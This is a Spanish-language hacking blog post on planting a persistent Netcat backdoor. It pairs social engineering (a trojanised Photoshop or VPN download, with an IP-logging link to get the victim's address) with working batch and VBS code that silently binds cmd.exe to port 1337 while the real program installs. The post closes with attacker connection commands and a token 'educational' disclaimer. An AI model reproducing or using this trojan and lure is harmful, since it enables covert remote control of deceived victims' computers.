Install a Exploit Persistant Backdoor Using Netcat



Instale una puerta trasera persistente de explotación mediante Netcat
Netcat es una herramienta de red que permite a través de intérprete de comandos y con una sintaxis sencilla abrir puertos TCP/UDP en un HOST (quedando netcat a la escucha), asociar una shell a un puerto en concreto (para conectarse por ejemplo a MS-DOS o al intérprete bash de Linux remotamente) y forzar conexiones UDP/TCP (útil por ejemplo para realizar rastreos de puertos o realizar transferencias de archivos bit a bit entre dos equipos). Fue originalmente desarrollada por Hobbit en 1996 y liberada bajo una licencia de software libre permisiva (no copyleft, similar a BSD, MIT) para UNIX. Posteriormente fue portada a Windows y Mac OS X entre otras plataformas. Existen muchos forks de esta herramienta que añaden características nuevas como GNU Netcat o Cryptcat. wikipedia

Entre sus múltiples aplicaciones, es frecuente la depuración de aplicaciones de red. También es utilizada a menudo para abrir puertas traseras en un sistema.
Exploit remoto. Si utiliza una red de comunicaciones para entrar en contacto con el sistema víctima. Por ejemplo puede usar otro equipo dentro de la misma red interna o tener acceso desde la propia Internet.
Netcat descargar para windows

https://eternallybored.org/misc/netcat/

https://joncraton.org/files/nc111nt_safe.zip

https://joncraton.org/blog/46/netcat-for-windows/
Download nc111nt.zip (password:nc) - Netcat for Windows
Netcat descargar para linux

http://netcat.sourceforge.net/download.php

https://sectools.org/tool/netcat/

apt install nc

apt update

Netcat descargar para termux
pkg install git
pkg install sh
git clone https://github.com/Pericena/Exploits-Netcat.git
cd Exploits-Netcat
bash exploincat.sh
nc IP-de-la-victima 1337

Linea de comando

La línea básica de comandos para Netcat es nc [opciones] host puertos, donde host es la dirección IP que se desea analizar y puertos es o un determinado puerto o un rango de puertos o una serie de puertos separados por espacios. Echemos un vistazo a cada una de las opciones.
-help

-d Permite que nc trabaje en forma silenciosa y se desenganche del indicador de comandos MS-DOS.

-e Un nc a la escucha podrá ejecutar el en el instante en que alguien se conecte al puerto en el que está escuchando.

-i Intervalo de espera, que es la cantidad de tiempo que nc esperará entre dos envíos de datos sucesivos.

-g
Se pueden especificar hasta 8 opciones –g en la línea de comandos para forzar que su tráfico nc pase por determinadas direcciones IP.

-G Esta opción le permitirá definir que dirección IP va a ser el siguiente salto dentro de la ruta indicada con la opción –g.

-l Activa el modo escucha de nc.

-L Activa el modo escucha de nc pero con más interés.

-n Indica a nc que no realice ninguna consulta de nombres de hosts.

-o Realiza un volcado hexadecimal de los datos y los almacena en un archivo hexadecimal.

-p Le permite especificar el puerto local que va a utilizar nc.

-r Nc elegirá aleatoriamente los puertos locales y remotos.

-s Especifica la dirección IP de origen que deberá utilizar nc cuando efectue sus conexiones.

-t Es capaz de controlar la negociación de opciones Telnet.

-u Indica a nc que utilice UDP en lugar de TCP.

-v Informa el estado de nc, si pones otra –v podrás obtener más información.

-w Controla cuanto tiempo va a esperar nc antes de dar por terminada una conexión.

-z Le dice a nc que envíe la cantidad de datos necesarias para conocer en que puertos se está escuchando algo.⇜⇝⇜⇝⇜⇝⇜⇝

Ingeniería social
lo que aremos es hacerle creer a nuestra victima que le pasaremos un programa "x" ejemplo :photoshop ,hack ,ultraiso,vpn, otros programas . Todos los archivos deben ser subido en un servidor de almacenamiento , para lograr nuestro objetivo debemos ponerlo en un acortado de link llamados iplogger lo encontras en este link :) https://lpericena.blogspot.com/2019/09/grabify-geolocalizacion-traves-de-enlace.html enviar este link a la victima pero antes debemos acortar el link con iplogger https://www.mediafire.com/file/zc6z11ln09sv4ga/Programa.zip/file

Instalación victima
Una vez descarga los programas lo que ara el xploits sera instalar el programa real , pero mientras tanto se ejecutara el payloads en segundo plano abriendo un shell remota .


El comando que se ejecutara sera nc.exe -lvp 1337 -e cmd.exe

Código de payloads.exe
≪ °° ≫
@echo off
TITLE Remote
cls
cd programa
nc.exe -lvp 1337 -e cmd.exe
≪ °° ≫
payloads.exe nos permitirá abrir una puerta de enlace

Código de script.vbs
≪ °° ≫
Set WshShell=CreateObject("WScript.Shell")
WshShell.Run chr(34) & "payloads.exe" & Chr(34),0
Set WshShell=Nothing
≪ °° ≫
script.vbs nos permitira ejecutar el payloads en segundo plano

Código xploits.exe
≪ °° ≫
@echo off
TITLE install
cls
cd programa
start PSCS6.exe
start script.vbs
exit
≪ °° ≫
xploits.exe nos permitirá ejecutar el archivo vbs y exe

Observamos que nuestro expoits esta funcionando el programa photoshop funciona correctamente al igual que el script.vbs se ejecuta en segundo plano con el puerto 1337


Conexión atacante
Para este ataque necesitamos la ip de la victima como sabemos el puerto que usaremos sera 1337 , al usar el link de acortadores link aquí (0.0)=" https://lpericena.blogspot.com/2019/09/grabify-geolocalizacion-traves-de-enlace.html " podemos también obtener la ip del visitante en este caso seria la victima

En windows ejecutamos el nc.exe para poder introducir los datos o usar en la shell nc -n -v ip 1337
pero tenemos otra opción ejecutando xploitsnc.exe


En Linux introducimos en shell nc IP 1337 o ncat IP 1337 pero también tenemos otra opción usando un script en bash para poder ejecutar la tarea de conexión




En termux abrimos la app introducimos en nuestra terminal el comando nc IP 1337

De esa manera podemos tener acceso a un dispositivo







Conviértete en el mayor hacker del mundo Descarga gratis la app The Seven Codes y comparte

Google playSígueme

ADVERTENCIA: NO INTENTE HACER UN ATAQUE SIN EL PERMISO DE PROPIETARIO DEL SITIO WEB. ES UN PROPÓSITO EDUCATIVO SOLAMENTE.

NO ES RESPONSABLE DE NINGÚN TIPO DE PROBLEMA ILEGAL.

PERMANECE LEGAL.

GRACIAS!

Si tienes algún problema, deja un comentario y comparte tú opinión.

¿Ha quedado contestada su pregunta?

Mi nombre es Luishiño aquí es donde me gusta escribir sobre temas que en su momento me interesan. Aveces sobre mi vida personal y principalmente cosas de programación ,desarrollo web.Aplicaciones,Software, programas que yo mismo las desarrollo y cosas básicas de informática..

Fuente: este post proviene de The Seven Codes, donde puedes consultar el contenido original.
¿Vulnera este post tus derechos? Pincha aquí.
Creado:
¿Qué te ha parecido esta idea?

Esta idea proviene de:

Y estas son sus últimas ideas publicadas:

SISTEMA DE DIAGNOSTICO Se desea diseñar un diagrama de clases para administrar el trabajo del médico que mediante una cuenta de usuario deberá: • Un administrador se encargará de administrar el sistem ...

¿Qué es el SQL injection? Una inyección de SQL, a veces abreviada como SQLi, es un tipo de vulnerabilidad en la que un atacante usa un trozo de código SQL (lenguaje de consulta estructurado) para mani ...

Etiquetas:

Recomendamos